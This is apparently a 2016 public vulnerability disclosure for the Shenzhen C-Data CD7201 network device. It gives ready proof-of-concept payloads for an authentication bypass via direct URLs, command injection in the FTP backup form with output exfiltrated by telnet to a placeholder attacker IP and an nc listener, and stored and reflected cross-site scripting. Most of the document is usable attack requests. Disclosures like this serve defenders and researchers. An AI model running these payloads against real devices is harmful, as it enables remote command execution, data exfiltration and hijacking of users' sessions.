Shenzhen C-Data CD7201 with software version 2.4.6b and firmware version 7.1.0 suffer from authentication bypass, command injection, and cross site scripting vulnerabilities.
2f2406c1fed6720250bfb64cda0f49c8# Title: Shenzhen C-Data CD7201 / Multiple Vulnerabilities
# Date: 10/09/2016
# Discovered by: @codexlynx
# Vendor: Shenzhen C-Data
# Vendor homepage: cdatatec.com
# Model: CD7201
# Software Version: 2.4.6b
# Firmware Version: 7.1.0
# Category: hardware, web, rce, xss
[1]Authentication Bypass
--------------------------------
Only the main HTML iframe is protected, you can access the others via the direct URL.
- POC: Display links of the menu to bypass all the pages.
http://[target]/cgi-bin/frame.php?page=frame_menu
[2]Command Injection
--------------------------------
"FTP Backup Recovery" is insecure, you can inject system commands.
You can use "telnet" to the command output exfiltration.
- POC 1: Basic injection:
curl --data "ftp_port=21&ftp_user=admin&ftp_passwd=admin&file_name=test&ipaddr=127.0.0.1&call_function=backup&ftp_ip=\`[Inject here]\`" http://[target]/cgi-bin/system.php?page=system_management_save
- POC 2: Injection and exfiltration:
Shell 1: nc -vlp 9999
Shell 2: curl --data "ftp_port=21&ftp_user=admin&ftp_passwd=admin&file_name=test&ipaddr=127.0.0.1&call_function=backup&ftp_ip=\`[Inject here]|telnet [Attacker IP] 9999\`" http://[target]/cgi-bin/system.php?page=system_management_save
[3]Stored Cross-Site-Scripting
--------------------------------
Many metadata fields don't sanitize inputs.
- POC: Persistent XSS in the "Location" field (http://[target]/cgi-bin/system.php?page=hardware_information).
Location" style="width:90%"><script>[Javascript Here]</script><span class="
[4]Cross-Site-Scripting
--------------------------------
Many GET parameters don't sanitize inputs.
- POC: XSS in the "slave_mac" parameter.
http://[target]/cgi-bin/slaves.php?page=slave_detail_top&slave_mac="/><script>[Javascript Here]</script>